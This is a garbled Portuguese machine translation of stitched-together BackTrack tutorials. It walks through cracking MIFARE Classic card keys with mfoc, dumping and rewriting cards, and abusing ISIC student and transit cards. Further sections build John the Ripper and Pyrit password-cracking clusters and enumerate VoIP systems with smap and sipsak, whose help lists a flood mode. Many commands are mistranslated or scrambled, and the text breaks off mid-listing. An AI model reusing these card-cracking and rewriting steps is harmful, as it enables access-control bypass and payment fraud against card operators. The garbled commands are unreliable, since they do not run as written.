Este no AZ guia para tentar mais!

0x00 - Prefcio
Alguns de vocs podem ter lido que o algoritmo de criptografia de chave simtrica
proprietrio do carto MIFARE Clssico foi quebrado. O carto Mifare Classic
usado em sistemas de controle de acesso fsico (PACS) e entre em contato com
sistemas menos pagamentos (incluindo tollway e sistemas de transporte
pblico). Por algumas estimativas, existem 500 milhes de cartes MIFARE
implantados em todo o mundo, ea maioria deles so cartes MIFARE Classic.

Mifare Classic um barato, chip de nvel de entrada, com base na ISO / IEC 14443
Tipo A, ou 1KB 4KB. Usa 13,56 Mhz padro carto inteligente sem contato,
CRYPTO1 proprietrio com 48 teclas de bits. No h proteo contra a clonagem
ou modificaes. Qualquer pessoa com 50 leitor pode usar esta fraqueza contra
sua infra-estrutura. Pelo menos um setor sempre criptografado com chave
padro. Aps quebrar todas as chaves, os hackers so capazes de alterar o nome,
nmero de estudantes universitrios, data de validade ... Este livro prova de
conceito como fcil que pode ser feito. Ingredientes escolhidos: Backtrack |
touchatag pacote inicial Testado em: BackTrack 4 R2, BackTrack 5 final (32 bits)

Dependncias
root @ bt: ~ # apt-get install Flex libpcsclite-dev libusb-dev
checkinstall

0x01 - Hardware
Touchatag - ACR122U
Touchatag ACR122 ACS (U) NFC Leitor USB leitor RFID. O leitor USB funciona
em 13,56 MHz (High Frequency RFID) e tem uma distncia de leitura de cerca de

4 centmetros (1 polegada), quando utilizado com as marcas touchatag RFID. Este


produto feito por Advanced Systems Limited carto e parece estar disponvel em
layouts diferentes, mas hardware no difere muito. Eles esto todos usando um
PN532 Chip controlador NFC e uma unidade ST7 microcontrolador.

0x02 - Software
Motorista ACR122U
-D acr122u
root @ bt:
root @ bt:
root @ bt:
root @ bt:
root @ bt:
root @ bt:

ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
~ # cd acr122u
~ # tar-jxvf acsccid-1.0.2.tar.bz2
~ # cd acsccid-1.0.2
~ # . / configure
~ # fazer
~ # checkinstall-D-y - instalar

Open Source Near Field Communication (NFC) Library /


LIBNFC /
Libnfc o primeiro livre NFC SDK e programadores API liberado sob a Licena
Pblica GNU Lesser General.
root @ bt: ~ # apt-get install-y && debhelper wget libtool
http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz
root @ bt: ~ # tar xfvz libnfc-1.4.2 tar.gz && cd libnfc-1.4.2.
root @ bt: ~ # svn checkout
http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian
root @ bt: ~ # dpkg-buildpackage-rfakeroot
root @ bt: ~ # . dpkg-i .. / libnfc * deb

Verifique se o seu leitor / alvo com nfc lista.


root @ bt: ~ # nfc lista
nfc lista de uso libnfc 1.4.2 (r891)
Conectado a um dispositivo NFC: ACS ACR122U 00 00 / ACR122U103 - PN532
v1.6 (0x07)
1 ISO14443A alvo passivo (s) foi encontrada:
ATQA (SENS_RES): 00 02
UID (NFCID1): xx xx xx xx
SAK (SEL_RES): 18

Se o leitor rejeitada por causa do firmware (mensagem de log: "Firmware (xy)


falso") basta desabilitar a verificao de verso. Tudo que voc precisa fazer
mudar ifdDriverOptions (linha 55 em Info.plist) para ignorar a verificao de verso
como esta:

root @ bt: ~ # nano / usr / lib / PCSC / drivers / IFD-ccid.bundle /


Contents / Info.plist
ifdDriverOptions
0 0005

Em seguida, reinicie o daemon pcscd e seu leitor touchatag deve ser reconhecida
e pronto.

MFOC-Mifare Clssico Cracker offline


Mifare Cracker clssico off-line uma ferramenta que pode recuperar as chaves
de cartes Mifare Classic. Graas a Norbert Szetei e Luptak Pavol para sua
implementao ataque. MFOC utilidade para computar (crack) todas as chaves
(A e B) para todos os sectores, proporcionando pelo menos uma das teclas j
conhecido. Arquivo de Chaves o arquivo, onde mfoc vai armazenar as chaves
rachados. Formato do arquivo compatvel com NFC-mfclassic, para que voc
possa us-lo para despejar o carto no arquivo, ou escrever um depsito no
carto.
root @ bt: ~ # wget http://nfc-tools.googlecode.com/files/mfoc0.10.2.tar.gz~~HEAD=NNS && tar-xvzf mfoc 0.10.2.tar.gzroot @ bt: ~ # cd mfoc-0.10.2
root @ bt: ~ # autoreconf-vis
root @ bt: ~ # . / configure
root @ bt: ~ # fazer
root @ bt: ~ # checkinstall-D-y - instalar

0x03 - Dumping & Cooking


psscd coordena o carregamento de drivers para leitores de cartes. Ele permite
que aplicativos acessem os cartes inteligentes e leitores sem saber detalhes do
carto ou leitor. um gerenciador de recursos que coordena a comunicao com
leitores de cartes inteligentes e cartes inteligentes e tokens criptogrficos que
esto conectados ao sistema. Eu prefiro comear pcscd em primeiro plano (sem
daemon) com pcscd-f.Ento hora de comear a mfoc. Use elevado nmero de
sondas, porque o nmero padro de sondas para uma chave de recuperao para
um setor de 20. Craqueamento inteiros pode levar de 30 minutos a 30 horas.

Voc tambm pode usar o parmetro-k-chave, para adicionar uma chave para a
lista de chaves conhecidas, que vem sendo tentado contra a sua placa na fase
inicial. A opo-k de alguma forma no funcionou para mim, ento eu sempre
compilar as minhas chaves conhecidas diretamente em Pesquisa mfoc.c para
"Array com teclas padro Mifare Classic" No tenho certeza sobre outros pases,
mas no pas onde eu moro chaves so as mesmas . Uma vez que voc tem as
chaves de todos os setores, voc deve ser capaz de usar RFID-Fu contra as
outras cartas, o que pico da falha.
root @ bt: ~ # nfc-mfclassic - ajuda
Uso: NFC-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]
r | w - Execute ler (r) ou escreva para (w) carto
a | b - Use as teclas A ou B para a ao
<dump.mfd> - MiFare Dump (MFD) usado para escrever (carto de MFD) ou
(MFD para o carto)
<keys.mfd> - Dump MiFare (MFD) que contm as chaves (opcional)
Ou: NFC-mfclassic x <dump.mfd> <payload.bin>
x - Extrato de carga (blocos de dados) de MFD
<dump.mfd> - Dump MiFare (MFD) que contm carga queria
<payload.bin> - arquivo binrio onde payload ser extrado

Tenha em mente que UID carto no sero afetados (no mudou) com este
processo. Comprar algum carto em branco ou Proxmark III se isso que voc
quer. Se voc est pensando agora sobre o dumping sua carteira eletrnica logo
depois de recarga de crdito e quando chega a zero, escrever o contedo de volta,
ento por favor no faa isso. O que voc pode parar de fazer isso? Bem,
provavelmente s a sua conscincia, mas se o carto bloqueado em 24 horas
aps a primeira utilizao, em seguida, no se queixam. Sim, h a verificao online e sistemas de faturamento l fora para os cartes bsicos.

0x04 - ISIC Edio


Com ISIC-International Student atacante Bilhete de Identidade pode abusar cerca
de dez servio no apenas um. Cartes ISIC so amplamente utilizados para a
entrada, transporte pagamentos, restaurantes e servios de vrios outros ou
descontos. De acordo com a pgina inicial, h 4,5 milhes de portadores de
cartes em 120 pases. Cartes devem ser substitudos por outros tipos de
seguros mais rpido possvel. possvel fazer muito mais do que isso, mas
suficiente para a demonstrao vamos jogar um pouco ...

Em algumas universidades, h apenas uma verificao de segurana entrada ISIC. Como voc pode ver isso trivial para ignorar. Fizemos muitos testes com
sistemas de transporte pblico e com os sistemas universitrios. Os resultados so
tudo a mesma coisa - esses sistemas so facilmente hackable.

0x06 - Concluso
Finalmente, quando as pessoas vo aprender a lio? Algoritmos criptogrficos
deve ser pblica de modo que eles podem ser controladas e testados. Algoritmos
secretos no so mais valiosos, porque eles so secretos. Qualquer pessoa que
precisar de um carto inteligente altamente seguro deve se certificar de que h
segurana em camadas e no apenas depender de criptografia do chip.

0x07 - Qual o prximo?

Desde que eu tenho acesso a Proxmark III, que universal ferramenta de


hacking RFID que pode ser usado para clonagem 100% precisas (mesmo UID),
eu posso escrever uma vez sobre a segunda edio c00king com Mifare
Classic e Prox HID ...

Armar BackTrack com GSM ataque suite?

0x08 - Obrigado
Este livro foi feito com grande ajuda dos caras h4f, muito obrigado a Vulcano e
Back.

0x09 - Referncias e Links


Para ler mais sobre este assunto consulte a seguir:

http://www.cs.virginia.edu/ ~
kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf

http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html~~V

http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf

http://www.nethemba.com/mifare-classic-slides.pdf

http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - Sobre
MI1 um "entusiasta de segurana em tempo integral", com diploma universitrio
na rea de informtica. Recentemente, centrando a sua paixo por coisas USRP e
RFID.

Escalonamento de privilgios
CUDA no BackTrack 5
Este guia um trabalho em progresso, e se destina a ajudar aqueles que precisam
obter CUDA trabalhando em suas mquinas de inversas.
Comece por preparar os fontes do kernel para a instalao do driver Nvidia:
root @ bt: ~ # preparar-kernel-fontes
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / gerado / * include / linux /

Baixar drivers da Nvidia de acordo com sua arquitetura de CPU:

32

64

Verifique se voc no estiver em uma sesso X (sair para o console), e execute o


instalador do driver Nvidia.
Em seguida, baixe o kit de ferramentas CUDA, de acordo com sua arquitetura de
CPU:

32

64

Idealmente, voc deve instalar o kit de ferramentas para CUDA / opt . este guia
presume este caminho de instalao. Configurar as variveis de ambiente para
que o NVCC comando funciona. Voc pode fazer isso adicionando as seguintes
linhas no seu / root / .bashrc arquivo:
PATH = $ PATH :/ opt / cuda / bin
LD_LIBRARY_PATH = $ LD_LIBRARY_PATH :/ opt / cuda / lib
export PATH
export LD_LIBRARY_PATH

Em seguida, execute:
root @ bt: ~ # source / root / .bashrc
root @ bt: ~ # ldconfig

O propsito deste era fazer com que compilador NVCC instalado. Voc pode
verificar se tudo est configurado corretamente:

root @ bt: ~ # que NVCC


/ Opt / cuda / bin / NVCC
root @ bt: ~ # NVCC-V
NVCC: NVIDIA (R) Cuda motorista compilador
Copyright (c) 2005-2011 NVIDIA Corporation
Construdo sobre Sun_Mar_20_16: 45:27 _PDT_2011
Ferramentas de compilao Cuda, liberao 4.0, V0.2.1221
root @ bt: ~ #

Agora que o driver da Nvidia CUDA Toolkit e esto instalados, podemos testar a
sua funcionalidade com uma ferramenta de GPU alimentao, tal como pyrit.
root @ bt: ~ # svn checkout
http://pyrit.googlecode.com/svn/trunk/~~HEAD=NNS pyrit
root @ bt: ~ # cd pyrit / pyrit && python setup.py construir && python
setup.py install
root @ bt: ~ # cd .. / .. /
root @ bt: ~ # cd pyrit / cpyrit_cuda && python setup.py construir &&
python setup.py install

Executar um ponto de referncia para ver se tudo funciona como esperado:


root @ bt: ~ do # pyrit referncia
Pyrit 0.4.1-dev (SVN r308) (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.com
Este cdigo distribudo sob a v3 GNU General Public License +
Referncia em execuo (63787.8 PMKs / s) ... \
Computadorizada 63.787,82 total de PMKs / s.
# 1: 'CUDA Dispositivo-# 1 "GeForce GTX 295 : 11558.7
3.0)
# 2: "CUDA-Device # 2 'GeForce GTX 295 : 10912.5 PMKs
# 3: "CUDA Dispositivo # 3 'GeForce GTX 295 : 10632.1
3.0)
# 4: 'CUDA-Device # 4' GeForce GTX 295 : 11654.7 PMKs
# 5: "CUDA-Device # 5 'GeForce GTX 295 : 10868.9 PMKs
# 6: "CUDA Device-# 6 'GeForce GTX 295 : 10322.8 PMKs
# 7: 'CPU-Core (SSE2)': 500,7 PMKs / s (RTT 2,7)
# 8: 'CPU-Core (SSE2)': 508.9 PMKs / s (RTT 2,8)

PMKs / s (RTT
/ s (RTT 2.9)
PMKs / s (RTT
/ s (RTT 2.9)
/ s (RTT 2.9)
/ s (RTT 3,0)

Sucesso! Podemos agora usar ferramentas CUDA movidos a partir de dentro


BackTrack.

JTR aglomerado
Construindo um Cluster John the Ripper em
Backtrack5 R2

Neste tutorial, vamos construir um cluster que nos ajudar a quebrar hashes
usando o John the Ripper.

A primeira coisa que queremos fazer instalar libssl-dev e MPICH2 depois que
configur-lo. (Nota: secretword deve ser o mesmo em cada mquina.)

root
root
root
root
root
root
root
root
root
bt
root

@
@
@
@
@
@
@
@
@

bt:
bt:
bt:
bt:
bt:
bt:
bt:
bt:
bt:

~
~
~
~
~
~
~
~
~

#
#
#
#
#
#
#
#
#

apt-get install MPICH2 libssl-dev


touch / etc / mpd.conf
chmod 600 / etc / mpd.conf
echo "secretword = bt ">> / etc / mpd.conf
toque mpd.hosts
echo "192.168.1.69:1" >> mpd.hosts
chmod 600 mpd. Exrcitos
mpdboot
mpdtrace

@ bt: ~ # mpdallexit

Agora vamos instalar a verso do MPI de Joo Ripper.

xvfz john-1.7.3.1-all-2 mpi8.tar.gzroot @ bt: ~ / Desktop/john-1.7.3.1-all-2-mpi8/src # make clean linuxx86-SSE2


root @ bt: ~ # mv-f john-1.7.3.1-all-2-mpi8 pentest / / senhas / johnmpi

Depois de instalar a verso MPI de Joo Ripper, configuramos o nosso arquivo


/ etc / hosts.

root @ bt: ~ # nano / etc / hosts


127.0.0.1 localhost
192.168.1.69 servidor
192.168.1.70 node1

# As linhas seguintes so desejveis para hosts capazes de IPv6


Localhost :: 1 ip6-localhost ip6-loopback
FE00 :: 0 ip6-localnet
FF00 :: 0 ip6-mcastprefix
ff02 :: 1 ip6-allnodes
FF02 :: 2 ip6-allrouters

ff02 :: 3 ip6-allhosts

NOTA: Faa exatamente a mesma coisa no cliente.

Uma vez que temos o servidor ea configurao do cliente hora de permitir


que o nosso servidor SSH e transferir os arquivos de configurao do servidor
para o cliente.

root @ bt: ~ # ssh root@192.168.1.70 mkdir-p / root / .ssh


root @ bt: ~ # . cat / root / .ssh / id_rsa.pub | ssh
root@192.168.1.70 >> cat 'ssh / authorized_keys '
root @ bt: ~ # scp / root / mpd.hosts root@192.168.1.70 :/ root /
root @ bt: ~ # scp / etc / mpd.conf root@192.168.1.70 :/ etc /
root @ bt: ~ # scp / etc / hosts :/ etc root@192.168.1.70 /

Se iniciar o cluster devemos ver o nosso servidor e cliente.

root @ bt: ~ # mpdboot-v - file = / root / mpd.hosts-n 2


execuo mpdallexit em bt
LANADO mpd em bt via
FUNCIONAMENTO: mpd em bt
LANADO mpd em 192.168.1.70 via bt2
FUNCIONAMENTO: mpd em 192.168.1.70

root @ bt: ~ # mpdtrace


bt
bt2

Agora vamos testar o nosso cluster.

root @ bt: ~ # echo "admin: 21232f297a57a5a743894a0e4a801fc3"> / root


/ teste
root @ bt: ~ # scp / root / teste root@192.168.1.70 :/ root /
root @ bt: ~ # host-mpiexec 192.168.1.69 - np 2 / pentest / senhas /
john-mpi / run / john - formato: raw-MD5 / root / teste
Hash da senha carregado 1 (Raw MD5 [raw-md5])
admin (admin)
admin (admin)
Tpico: 1 palpites: 1 tempo: 0:00:00:00 100% (1) c / s: 160 a tentar:
admin - administradores
thread: 0 palpites: 1 tempo: 0:00:00:00 100% (1) c / s: 133 a tentar:
admin - administradores

Pyrit aglomerado
Construindo um Cluster Pyrit Backtrack5 R2

Neste tutorial, vamos construir um cluster em Backtrack5 R2 usando Pyrit.

Pyrit vem instalado por padro no Backtrack5 R2. Se voc tiver removido-lo,
basta usar o apt-get install para instal-lo.

O primeiro passo para a criao de um cluster de pyrit criar um ficheiro de


configurao.

root @ bt: ~ # . mkdir ~ / pyrit


root @ bt: ~ # nano ~ / .pyrit / config
root @ bt: ~ # cat ~ / .pyrit / config

default_storage = file :/ /
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.1.69 (Esse o IP servidores)
rpc_server = true
workunit_size = 75000

Depois de ter o arquivo de configurao acima em todas as nossas mquinas,


iniciar o servidor.

root @ bt: ~ # pyrit servir

Agora, a partir do cliente que voc deve ser capaz de ver ambos os ncleos.

NOTA: O comando pyrit list_cores tem um bug que quando usada ir travar o
servidor.

Ns podemos testar nosso cluster recm-construdo usando a opo de


referncia pyrit.

root @ bt: ~ # referncia pyrit

Se mudar para o servidor durante a execuo do benchmark, podemos ver


que, atualmente, um cliente est conectado.

Telefonia
Este artigo foi contribudo por NightRang3r.

URL: http://www.back-track.de/index.php?page=team # smtx

Twitter: ! http://twitter.com/ # / NightRang3r

E-mail: shai@exploit.co.il

Penetrao Teste VOIP com BackTrack


VoIP uma tecnologia interessante que fornece muitos benefcios e solues de
baixo custo para a comunicao. Mais e mais as pequenas empresas e empresas
esto substituindo seus antigos sistemas de telefonia tradicional com uma mais
baseadas em IP. Um PBX VoIP baseado pode fornecer muitas caractersticas tais
como: vrias extenses, identificador de chamadas, correio de voz, URA,
capacidades de gravao de conversas, registro, uso de telefones baseados em
hardware ou software based (aka soft phones). Agora dias, h muitos fornecedores
de PBX, telefones IP, servios VoIP e equipamentos, tais como: Cisco, Avaya e
ASTERISK, SNOM, THOMSON ... Com a nova tecnologia vem um novo desafio
para ambos os lados da defensiva e ofensiva de segurana, Um dos " grandes
perigos "de linhas telefnicas tradicionais que era suscetvel escuta. A "velha
escola" maneira de escutar na linha de algum telefone era conectar fisicamente
um pequeno transmissor que estava ligado dentro ou fora de suas instalaes em
algum lugar ao longo do fio de telefone.

Sistemas de telefonia IP tambm so suscetveis a interceptao, faz-lo em um


ambiente IP um pouco mais difcil de executar, detectar e exigem mais

conhecimento e do conjunto certo de ferramentas. Neste artigo no vamos discutir


um determinado fornecedor ou tcnica, mas vamos dar uma olhada nos conceitos
e as ferramentas disponveis para atacar VoIP disponveis para ns em Linux
Backtrack . O objetivo principal deste artigo apresentar as ferramentas e sua
finalidade, a fim de ajudar voc a escolher a ferramenta certa para a
situao. Vamos examinar alguns vetores de ataque do mundo real e descobrir
como BackTrack pode nos ajudar pentesting VoIP, vamos tambm analisar
algumas das ferramentas que apresentam no BackTrack e seu uso.

VoIP tpica Topologias


Existem vrias maneiras de telefonia baseada em IP podem ser implementadas,
aqui esto algumas topologias comuns e uso:

Auto-Hosted
Um PBX (ou seja, Asterisk) est instalado no local do cliente e conectado a um ISP
ou fornecedor de servios de telefonia PSTN atravs de um tronco SIP / PRI, o
trfego VoIP flui atravs de uma Vlan especfica.

Diagrama do Visio por Amir Avraham

Hosted Services
No h necessidade de um PBX no local. Apenas um switch, um roteador,
telefones IP e uma conexo com o PBX prestador de servios via internet ou IP /
VPN, cada telefone est configurado com as informaes da conta SIP.

Servio on-line SIP


Servios como sipme.me oferece um aplicativo para PC ou telefones inteligentes
e uma conta SIP gratuita, oferecendo preo baixo para as chamadas internacionais
e chamadas gratuitas entre os usurios do servio, atribuindo um nmero pone
para cada assinante.

Fundamentos SIP
O papel SIP (Session Initiation Protocol) a configurao, cancelar ou modificar
uma voz ou uma chamada de vdeo, onde a voz e / ou trfego de vdeo esto
sendo realizados atravs de um protocolo como RTP (Protocolo de transporte em

tempo real). SIP um protocolo de camada de aplicao que utiliza o UDP para o
transporte (TCP e SCTP pode ser usado como poo).

SIP normalmente utiliza as portas 5060 TCP ou UDP para a sinalizao


no criptografadas ou 5061 para transporte criptografada usando TLS.

SIP um protocolo baseado em ASCII que tem alguns elementos semelhantes,


como no protocolo HTTP usando um Pedido / modelo de Resposta.Muito parecido
com uma solicitao HTTP de um navegador de um pedido do cliente SIP feita
usando um URI SIP de um agente de usurio e um mtodo / pedido. SIP usa email como formato de endereos: user / telefone domnio @ / ip A URI SIP tpico
se parece com:
sip: 205@192.168.1.100, sip: username@pbx.com, sip: 205@192.168.1.100:
5060

De acordo com o pedido feito pelo cliente uma resposta ser recebido com um
cdigo de status ou de erro, as tabelas seguintes descrevem os pedidos e
respostas disponveis no protocolo SIP.

Os pedidos SIP / Mtodos


Pedido

Descrio

CONVIDAR Usado para convidar e explicar para participar de uma sesso de chamada.
ACK

Reconhea um pedido INVITE.

CANCELAR

Cancelar um pedido pendente.

CADASTRE-SE

Registre usurio com um servidor SIP.

OPES

Lista informaes sobre as capacidades de um chamador.

BYE

Termina uma sesso entre dois usurios em uma chamada.


Indica que o destinatrio (identificado pelo URI de solicitao)

REFER

deve contactar um terceiro usando as informaes


fornecidas no pedido.
O mtodo SUBSCRIBE usado para solicitar estado atual e

INSCREVA

atualizaes de estado a partir de um remoto


n.

O mtodo NOTIFY utilizado para notificar um n SIP que um evento


NOTIFY

qual tenha sido solicitada por um mtodo SUBSCRIBE anterior tiver


ocorrido.

Um exemplo SIP "INVITE" Pedido:


CONVIDAM SIP: 201@192.168.1.104 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102; rport; ramo = z9hG4bKvbxaoqar
Max-Forwards: 70
Para:
De: "NightRanger" ; Tag = eihgg
Call-ID: hfxsabthoymshub @ backtrack
CSeq: 649 INVITE
Contato:
Content-Type: application / sdp
Permitir: INVITE, ACK, BYE, CANCEL, OPTIONS, PRACK, REFER, NOTIFY,
subscrever, de mensagens informativas,
Suportados: substiturem, norefersub e 100rel
User-Agent: Twinkle/1.2
Content-Length: 310

As respostas SIP
Resposta

Descrio
Respostas informativos, pedido recebido e estar

1xx
processado.
Respostas bem sucedidas A ao foi recebida com sucesso,
2xx
compreendido e aceite.
3xx

Respostas de redirecionamento
Respostas falha do pedido O pedido contm erro de sintaxe ou

4xx
no podem ser cumpridas no servidor.
5xx

Respostas de falha no servidor O servidor no cumpriu uma

aparentemente pedido vlido.


Respostas fracasso global O pedido no pode ser cumprida em qualquer
6xx
servidor.

Um exemplo SIP "Tentando" Resposta:

SIP/2.0 100 Tentando


Via: SIP/2.0/UDP 192.168.1.102; ramo = z9hG4bKpmphujka; recebeu =
192.168.1.102; rport = 5060
De: "NIghtRanger" ; Tag = eihgg
Para:
Call-ID: hfxsabthoymshub @ backtrack
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Permitir: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Apoiado: substitui
Contato:
Content-Length: 0

SIP chamada entre 2 exemplos telefones

O telefone chamado envia um convite.

O telefone chamado envia uma resposta de 100 (Tentando).

O telefone chamado, em seguida, comea a tocar e envia uma resposta


de 180 (toque).

Quando o chamador pega o telefone o telefone chamado envia uma


resposta 200 (OK).

O telefone chamado envia uma resposta ACK.

Conversa comea via RTP.

Quando o chamador desliga o telefone um pedido BYE enviado.

O telefone chamado responde com 200 (OK).

Vetores de Ataque
Antes de comearmos com as ferramentas, vamos dar uma olhada em alguns
vetores comuns de ataques de VoIP:

Coleta de Informaes Footprinting, e Enumerao.

Monitoramento de trfego e chamadas telefnicas escutas.

Atacando de autenticao.

VLAN Hopping.

Denial of Service / Inundaes.

Caller ID Spoofing.

A fim de testar as ferramentas que tenho configurar um sistema de PBX TRIXBOX


e criou 6 extenses. Eu vou estar usando dois softphones, 1 cliente baseado em
Linux chamado Twinkle eo segundo um cliente baseado em Windows chamado
X-Lite. Eu vou estar usando a verso mais recente e maior do Linux
Backtrack que R2. Voc pode encontrar a maioria das ferramentas de ataque
VoIP no Backtrack sob o ttulo "/ pentest / voip /" diretrio:
root @ bt: ~ # cd / pentest / voip /
root @ bt :/ pentest / voip #

Ou voc pode simplesmente navegar utilizando o menu do KDE para o "Backtrack"


"Voice over IP" sub-menus:

Coleta de Informaes
Esta fase onde reunimos informaes sobre a topologia, os servidores e clientes
para saber informaes, tanto quanto podemos, a fim de lanar um ataque bem
sucedido. O que estamos interessados em encontrar hospedeiros ao vivo, tipo e
verso PBX, servidores VoIP / gateways, clientes (hardware e software) tipos e
verses etc ... Em vez de enumerar "usernames" estaremos enumerando
extenses SIP. Vamos dar uma olhada em algumas das ferramentas que est
disponvel no Backtrack para nos ajudar a encontrar, identificar e enumerar os
dispositivos VoIP habilitados.

SMAP
Backtrack inclui uma ferramenta de grande chamado SMAP , que um scanner
simples para SIP dispositivos SMAP expulsar vrios pedidos SIP aguardando
respostas de SIP roteador DSL habilitado, proxies e os agentes do usurio.
Poderia ser considerado um mash up de NMAP e sipsak.

Uso SMAP:

root @ bt :/ pentest / voip / smap # . / smap


smap 0.6.0

http://www.wormulon.net/~~V

uso: smap [Opes]


-H: esta ajuda
-D: aumentar a depurao
-O: permitir fingerprinting
-O: permitir mais fingerprinting verbose
-L: modo de aprendizagem de impresso digital
-T: transporte TCP
-U: transporte UDP (padro
-P0: Considera todos os anfitries como online - host pular
a descoberta de
-P : Porta de destino
-R : Mensagens por segundo limite da taxa de
-D : Domnio SIP para usar sem levar sip:
-W : Timeout em ms

Digitalizar um nico host:

root @ bt :/ pentest / voip / smap # . / smap 192.168.1.104


smap 0.6.0

http://www.wormulon.net/~~V

192.168.1.104: ICMP acessvel, SIP habilitado


1 host digitalizado, 1 alcanvel ICMP, 1 SIP (100,0%)

Digitalizar um intervalo de endereos IP:

root @ bt :/ pentest / voip / smap # . / smap 192.168.1.130/24


smap 0.6.0

http://www.wormulon.net/~~V

192.168.1.20: ICMP acessvel, SIP habilitado


192.168.1.22: ICMP acessvel, SIP habilitado
192.168.1.0: ICMP unreachable, SIP desativada

192.168.1.1: ICMP unreachable, SIP desativada


192.168.1.2: ICMP unreachable, SIP desativada
192.168.1.3: ICMP unreachable, SIP desativada
---- EDIT --192.168.1.250: unreachable ICMP, SIP desativada
192.168.1.251: unreachable ICMP, SIP desativada
192.168.1.252: unreachable ICMP, SIP desativada
192.168.1.253: unreachable ICMP, SIP desativada
192.168.1.254: unreachable ICMP, SIP desativada
192.168.1.255: unreachable ICMP, SIP desativada
256 hosts digitalizados, 7 alcanveis ICMP, 2 SIP habilitados (0,8%)

Agora que identificamos os anfitries SIP podemos usar a impresso digital SMAP
o tipo de servidor / cliente e verso:

root @ bt :/ pentest / voip / smap # . / smap-O 192.168.1.104


smap 0.6.0

http://www.wormulon.net/~~V

192.168.1.104: ICMP acessvel, SIP habilitado


melhor palpite de impresses digitais (70% de certeza):
Asterisk PBX SVN-r56579-tronco
User-Agent: Asterisk PBX
1 host digitalizado, 1 alcanvel ICMP, 1 SIP (100,0%)

No caso de SMAP no podia impresso digital, nosso anfitrio, usamos o


argumento-l para coloc-lo no modo de aprendizagem para fornecer algumas
informaes teis:

root @ bt :/ pentest / voip / smap # . / smap-l 192.168.1.104


smap 0.6.0
AVISO:
AVISO:
REFER,
AVISO:
AVISO:
AVISO:

http://www.wormulon.net/~~V

test_accept: "Aceitar: application / sdp"


test_allow: "Permitir: CONVIDAM, ACK, CANCEL, OPTIONS, BYE,
SUBSCRIBE, NOTIFY"
test_supported: "Com o apoio: substitui"
test_via: capitalizao de transporte: 2
test_via: "sucursal; alias; recebido; rport"

AVISO: test_via: Por favor, adicione cmpstr novo


AVISO: test_via: capitalizao de transporte: 2
192.168.1.104: ICMP acessvel, SIP habilitado
melhor palpite de impresses digitais (70% de certeza):
Asterisk PBX SVN-r56579-tronco
Informaes de impresso digital:
newmethod = 501
accept_class = 2
allow_class = 201
supported_class = 8
via_class = 2
hoe_class = ignorar
opes = 200
brokenfromto 404 =
PRACK = 481
de ping = 501
convidar = 200
User-Agent: Asterisk PBX
1 host digitalizado, 1 alcanvel ICMP, 1 SIP (100,0%)

Outro recurso til do SMAP o argumento-d que permite a sada de depurao


para uma verbosidade tentar usar o o-junto com ele para ver o processo de
impresso digital em detalhes.

root @ bt :/ pentest / voip / smap # . / smap-d 192.168.1.104


smap 0.6.0
DEBUG:
DEBUG:
DEBUG:
DEBUG:
DEBUG:

http://www.wormulon.net/~~V

IP local: 212.235.66.182
IP local: 212.235.66.182
bind () bem-sucedida
RAW socket aberto
mover 1 de S_START para S_PING

DEBUG: resposta de eco ICMP de erro


DEBUG: 192.168.1.104 / 1 pedido: SIP pedido OPTIONS (vlido)
DEBUG: resposta pertence a tarefa 1 (192.168.1.104)
DEBUG: ACK: sip: localhost SIP/2.0
Via: SIP/2.0/UDP 212.235.66.182:12345; ramo = z9hG4bK.56689; alias;
recebeu = 192.168.1.105; rport = 5060
De: ; Tag = 6b9ae50e67345d3b
Para: ; Tag = as14262fec

Call-ID: 1992951560@212.235.66.182
CSeq: 23915 ACK
Content-Length: 0
User-Agent: smap 0.6.0
--- Final de ACK 192.168.1.104: ICMP acessvel, SIP habilitado
DEBUG: destruir a tarefa 1

1 host digitalizado, 1 alcanvel ICMP, 1 SIP (100,0%)

SIPSAK
SIPSAK usado para testar aplicativos habilitados SIP e dispositivos usando o
mtodo de solicitao nica opo. Podemos us-lo para impresso digital e
enumerao. Voc no vai encontrar sipsak no "/ pentest / voip /" diretrio, voc
pode execut-lo de qualquer local, basta digitar sipsak.
root @ bt: ~ # sipsak
sipsak 0.9.6 por Nils Ohlmeier
Direitos Autorais (C) 2002-2004 Fokus FhG
Copyright (C) 2004-2005 Nils Ohlmeier
reportar bugs para nils@sipsak.org~~V~~HEAD=NNS
disparar: sipsak [-f arquivo] [-L]-s SIPURI
rastreamento: sipsak-T-s SIPURI
usrloc: sipsak-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z
NMERO]-s SIPURI
usrloc: sipsak-I | M [-b NMERO] [-e NMERO]-s SIPURI
usrloc: sipsak-U [-C SIPURI] [-x NMERO]-s SIPURI
mensagem: sipsak-M [B-STRING] [-O STRING] [-c SIPURI]-s SIPURI
inundao: sipsak-F [-e NMERO]-s SIPURI
aleatria: sipsak-R [-t NMERO]-s SIPURI
parmetro adicional em todos os modos:
[-A PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NMERO] [-n] [N]
[PORT-r] [-v] [-V] [-w]
-H exibe esta mensagem de ajuda
V-string da verso impressa s
-F file O arquivo que contm a mensagem SIP para enviar
usar - para a entrada padro
L-de-activate CR (\ r) insero em arquivos
-S SIPURI o URI do servidor de destino em forma
sip: [user @] servername [: port]
-T activa o modo de traceroute

-U activa o modo de usrloc


-Eu simula algumas chamadas bem-sucedidas com si
-M envia mensagens para si
-C SIPURI usar o uri dada como contato em REGISTER
-B NMERO o apndice nmero inicial para o nome de usurio (padro:
0)
NMERO-e o numer final do apndice do nome de usurio
-O nmero NMERO sono ms antes de enviar a prxima requisio
-X NMERO expira o cabealho campo valor (default: 15)
-Z NMERO ativa aleatoriamente remoo de ligaes de usurios
-F activa o modo de inundao
-R ativa as modues aleatrios (perigoso)
